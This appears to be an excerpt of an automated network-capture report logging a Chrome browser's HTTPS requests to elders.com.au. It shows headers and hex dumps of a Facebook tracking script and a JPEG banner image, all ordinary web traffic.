                                                                                                                                                                                                            Data Ascii: `+n'}y0<cqKom*wtd0%KbjWm)vDRBEb[WTuss)EI^!]Q'U;[2B3:=nv;nnW,SJD)@VA-FB$Ey1???o|S`13w!&~>t
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 38 04 0f 9f 69 9f 27 f3 a9 3f 3b 22 d2 50 3c 77 f5 2f 98 b2 71 44 e0 07 47 71 54 97 8c fc f4 27 66 cf 4d 53 24 8a e4 aa 96 9c 35 2c 58 1a b9 b2 9f 1b 51 b7 64 69 66 30 97 76 ff a5 60 49 17 d1 b1 40 83 3b 59 32 d2 6a e7 65 63 12 6c e7 db 15 c2 f6 5c 95 30 d9 d8 b4 88 46 5c 03 d6 29 62 ca 13 a6 9c 31 cf 3a fe 6b 45 ad 13 d2 24 f6 a1 e5 07 da 18 51 2f 45 08 b6 f1 85 be 5e 19 a9 63 66 0d 45 ca b8 32 92 45 90 31 6d f7 80 18 40 d0 aa 41 5d 7f 82 de 0f 51 b0 92 2a 99 5d 49 b4 f5 cd 72 36 83 16 61 84 94 34 44 a8 ea 6b 23 6f 11 60 46 60 46 25 c9 8f e4 20 f9 9a 0b 57 a0 64 94 bc c7 34 df 88 08 31 ef b1 cc ab ae ab 15 fb 35 23 a5 80 b5 56 04 84 56 ac f0 c1 ae ef e1 fa 2f f7 c0 c8 69 77 9e 64 a6 69 81 8a be 8f d4 66 a6 20 85 6b ff fb 9f ff 6f f1 c5 bf fb 4b f8 8e ff
                                                                                                                                                                                                            Data Ascii: 8i'?;"P<w/qDGqT'fMS$5,XQdif0v`I@;Y2jecl\0F\)b1:kE$Q/E^cfE2E1m@A]Q*]Ir6a4Dk#o`F`F% Wd415#VV/iwdif koK
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 71 c5 f5 ab 9d 71 96 81 58 e9 18 52 85 a2 5a 48 46 17 98 56 90 40 bd 34 7e 0c 13 d4 b6 38 f5 85 4e f2 39 02 42 ec a1 6a 73 ca 52 ea 15 82 e6 14 1e ea 71 d4 fe cb 5c c0 55 95 b2 2a f3 bc 8c 04 1d b6 d8 a9 a3 68 6d 07 6c ce 00 cd 99 32 48 7b 01 0c cf 42 10 a3 2e 82 4c 4d 09 34 b5 a2 0d fd 81 44 f5 71 7c 44 aa 46 1b 70 e0 28 e0 28 14 2b 2f db 78 1d af a9 8d 37 ae 90 b8 7e ff 2c fd a9 2d a6 ac ed 3a 4a 5e a5 f5 ca 9a 51 f6 6b 23 59 b5 9a 7a 25 0e 66 6e 0e a7 11 a7 4e 1e 43 08 28 64 39 7b d4 3e 93 59 db cb 58 1e 17 7a 2e d5 b8 9e 10 a1 87 41 b9 a7 9c c8 fb 6c be 50 77 1a 43 45 2c 05 b9 24 a4 5c 30 a5 84 a5 68 e8 b2 2a 01 2e 15 71 4a 1a e1 88 da 36 87 0e 6c 86 9d e7 b1 43 14 34 4a d0 d4 b7 fe 66 04 92 04 76 0e 32 fe 8c 58 f4 b1 cf 4a 2c 30 18 a5 3e b6 60 df 61
                                                                                                                                                                                                            Data Ascii: qqXRZHFV@4~8N9BjsRq\U*hml2H{B.LM4Dq|DFp((+/x7~,-:J^Qk#Yz%fnNC(d9{>YXz.AlPwCE,$\0h*.qJ6lC4Jfv2XJ,0>`a
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 98 36 9b 16 12 0c 29 49 d1 45 8a ad 7b 3b 0d b9 2e d6 50 94 b4 6a 4d ae 93 f4 11 31 4c 5e 3c 0e 37 1c 9c b7 55 90 0d bf 1f 49 ef c1 b5 8c 64 94 65 5e ca 78 94 66 89 5c 00 ce 05 01 3d 7f ee f2 ea 0a 29 46 ec f7 2b ce ce ce b0 bd 38 c3 cd f5 2b bc fb f6 3b 78 fe e4 09 f6 eb 0a 28 01 3a 3f 3f c3 d5 fd 07 78 f4 c6 43 5c 5d 5d 21 46 c2 ba bb 06 e7 0a 9a 66 c4 44 c0 bc c5 5b 9f f8 14 ce af ee e1 9d b7 df c7 97 bf fa 0e 6e 6f 56 30 43 f3 4f 4c 1d 2e 28 cc 60 92 5c ca cd ac 4a 6e 0c b8 bd dd 6b c2 bc f4 75 93 05 8c da 73 69 04 47 6d 45 24 c9 bb 0a b1 e7 58 c5 d8 bb b2 07 23 61 2d 3f ce ca f8 e5 5e d5 5a 11 34 e7 72 1c e3 c1 42 6d 10 52 c0 46 5c a0 4a ce d0 17 2a 90 8d cf de 2f cf c8 d2 48 84 ac 3d 87 fd 3d aa 28 7f 1c 48 5a 87 0c d5 73 23 a1 b2 9d 10 c6 63 8f cf
                                                                                                                                                                                                            Data Ascii: 6)IE{;.PjM1L^<7UIde^xf\=)F+8+;x(:??xC\]]!FfD[noV0COL.(`\JnkusiGmE$X#a-?^Z4rBmRF\J*/H==(HZs#c
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 89 71 2d 05 b5 06 d9 7b 89 54 e6 25 99 38 46 4a aa 96 3b ab 29 68 06 51 06 7d c0 14 55 81 9a 12 b6 f3 84 ed 3c 61 33 27 6c e6 05 5b 6d bb f0 41 f9 15 96 d0 1a d3 a4 89 80 b2 f5 4b 4c d2 33 04 41 26 88 11 1c 80 b5 8a 4e 72 0b 6a 2d 9a a4 29 06 a3 93 21 0d 13 a2 e7 62 35 95 05 e8 79 06 7a ff 32 57 d9 ae 66 90 bd 45 cd ab 4d 4d 6a ba 53 60 94 18 90 d8 3a d1 13 50 8a 96 b6 6b c8 c2 a4 7c 04 54 94 a3 8e d2 a3 72 21 db 46 f0 b0 98 c1 fa 2d 0d f9 2e 80 24 b7 23 4a e8 31 a5 28 2a 1e 57 94 9c 41 41 92 93 2d 01 f7 58 59 19 c3 0c 21 04 e4 65 8b cd d9 16 cb b2 60 b7 db 1d 28 9d 07 9e 68 ad 20 2a 20 24 09 7d 26 5b 38 ab aa 9b 96 2b 04 18 4d 78 2d 59 5b 9f 03 0d 13 f8 4e 1c f1 2e 51 ab 0e af e1 ae d7 01 e9 57 93 62 44 5a 66 5c dc bb 87 f3 ab 7b 98 55 bd 32 e5 6a cc c1
                                                                                                                                                                                                            Data Ascii: q-{T%8FJ;)hQ}U<a3'l[mAKL3A&Nrj-)!b5yz2WfEMMjS`:Pk|Tr!F-.$#J1(*WAA-XY!e`(h * $}&[8+Mx-Y[N.QWbDZf\{U2j


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            148192.168.2.457832157.240.0.64432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1372OUTGET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                            Host: connect.facebook.net
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                            content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-YFbXQBmO' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                            document-policy: force-load-at-top
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1491INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                            Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC14893INData Raw: 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f
                                                                                                                                                                                                            Data Ascii: urn!1}return!0}())return;var g=typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbo
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1491INData Raw: 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                            Data Ascii: =typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbol==="function"?Symbol.prototyp
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1491INData Raw: 20 62 3d 61 2e 74 61 72 67 65 74 3b 61 3d 61 2e 70 69 78 65 6c 3b 72 65 74 75 72 6e 20 69 28 7b 65 78 74 72 61 63 74 6f 72 73 42 79 50 69 78 65 6c 73 3a 67 2c 66 62 71 49 6e 73 74 61 6e 63 65 3a 65 2c 70 69 78 65 6c 3a 61 2c 74 61 72 67 65 74 3a 62 7d 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61
                                                                                                                                                                                                            Data Ascii: b=a.target;a=a.pixel;return i({extractorsByPixels:g,fbqInstance:e,pixel:a,target:b})})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.iwlparameters");f.registerPlugin&&f.registerPlugin("fbevents.plugins.iwlpara
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC13402INData Raw: 65 6e 67 74 68 29 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 63 5b 62 5d 3d 61 5b 62 5d 3b 72 65 74 75 72 6e 20 63 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 61 29 7d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64
                                                                                                                                                                                                            Data Ascii: ength);b<a.length;b++)c[b]=a[b];return c}else return Array.from(a)}f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsMod
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1491INData Raw: 65 6e 67 74 68 3e 30 3b 66 3d 6e 2e 6c 65 6e 67 74 68 3e 30 3b 69 66 28 6b 7c 7c 66 29 7b 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e 69 64 29 3b 67 2e 6c 6f 67 55 73 65 72 45 72 72 6f 72 28 7b 74 79 70 65 3a 22 55 4e 57 41 4e 54 45 44 5f 43 55 53 54 4f 4d 5f 44 41 54 41 22 7d 29 3b 70 3d 7b 7d 3b 6b 26 26 28 70 2e 75 70 3d 6d 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 66 26 26 28 70 2e 72 70 3d 6e 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 72 65 74 75 72 6e 20 70 7d 7d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e
                                                                                                                                                                                                            Data Ascii: ength>0;f=n.length>0;if(k||f){a.performanceMark("fbevents:end:unwantedDataProcessing",b.id);g.logUserError({type:"UNWANTED_CUSTOM_DATA"});p={};k&&(p.up=m.join(","));f&&(p.rp=n.join(","));return p}}a.performanceMark("fbevents:end:unwantedDataProcessing",b.
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1491INData Raw: 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65
                                                                                                                                                                                                            Data Ascii: eturn e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.unwanteddata");f.registerPlugin&&f.registerPlugin("fbevents.plugins.unwanteddata",e.exports);f.ensureModuleRegistered("fbevents.plugins.unwanteddata",function(){return e
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC13402INData Raw: 4c 69 73 74 22 29 3b 76 61 72 20 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 47 65 74 49 73 49 6f 73 49 6e 41 70 70 42 72 6f 77 73 65 72 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 47 65 74 49 73 41 6e 64 72 6f 69 64 49 41 57 22 29 2c 6b 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 43 6f 6e 66 69 67 53 74 6f 72 65 22 29 2c 6c 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 68 61 32 35 36 5f 77 69 74 68 5f 64 65 70 65 6e 64 65 6e 63 69 65 73 5f 6e 65 77 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 72 65 74
                                                                                                                                                                                                            Data Ascii: List");var i=f.getFbeventsModules("signalsFBEventsGetIsIosInAppBrowser"),j=f.getFbeventsModules("signalsFBEventsGetIsAndroidIAW"),k=f.getFbeventsModules("SignalsFBEventsConfigStore"),l=f.getFbeventsModules("sha256_with_dependencies_new");function m(a){ret
                                                                                                                                                                                                            2024-11-06 05:29:56 UTC1491INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 48 28 62 2c 63 2c 64 2c 66 29 7b 76 61 72 20 67 3d 49 5b 62 2e 69 64 5d 3b 64 2e 63 73 5f 65 73 74 3d 21 30 3b 69 66 28 67 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 72 79 7b 69 66 28 74 2e 69 73 4d 61 74 63 68 45 53 54 52 75 6c 65 28 67 2e 63 6f 6e 64 69 74 69 6f 6e 2c 63 29 29 7b 69 66 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 69 66 28 63 21 3d 3d 70 2e 44 45 52 49 56 45 5f 45 56 45 4e 54 29 72 65 74 75 72 6e 3b 63 3d 61 28 7b 7d 2c 64 29 3b 76 61 72 20 68 3d 7b 65 76 65 6e 74 49 44 3a 66 7d 3b 67 2e 72 75 6c 65 5f 69 64
                                                                                                                                                                                                            Data Ascii: e}function H(b,c,d,f){var g=I[b.id];d.cs_est=!0;if(g==null)return;n(g,function(g){try{if(t.isMatchESTRule(g.condition,c)){if(g.transformations==null)return;n(g.transformations,function(c){if(c!==p.DERIVE_EVENT)return;c=a({},d);var h={eventID:f};g.rule_id


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            149192.168.2.457830162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC980OUTGET /content/dam/eld/images/homepage-banners/staff_background_wheat.jpg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:56 GMT
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            Content-Length: 137787
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            Cf-Bgj: h2pri
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            content-disposition: attachment; filename="staff_background_wheat.jpg"; filename*=UTF-8''staff_background_wheat.jpg
                                                                                                                                                                                                            etag: "0x8DCBDC3609A69A7"
                                                                                                                                                                                                            last-modified: Fri, 16 Aug 2024 07:16:41 GMT
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210175-DFW
                                                                                                                                                                                                            x-timer: S1726803116.375133,VS0,VS0,VE1413
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aaacf2d45-DFW
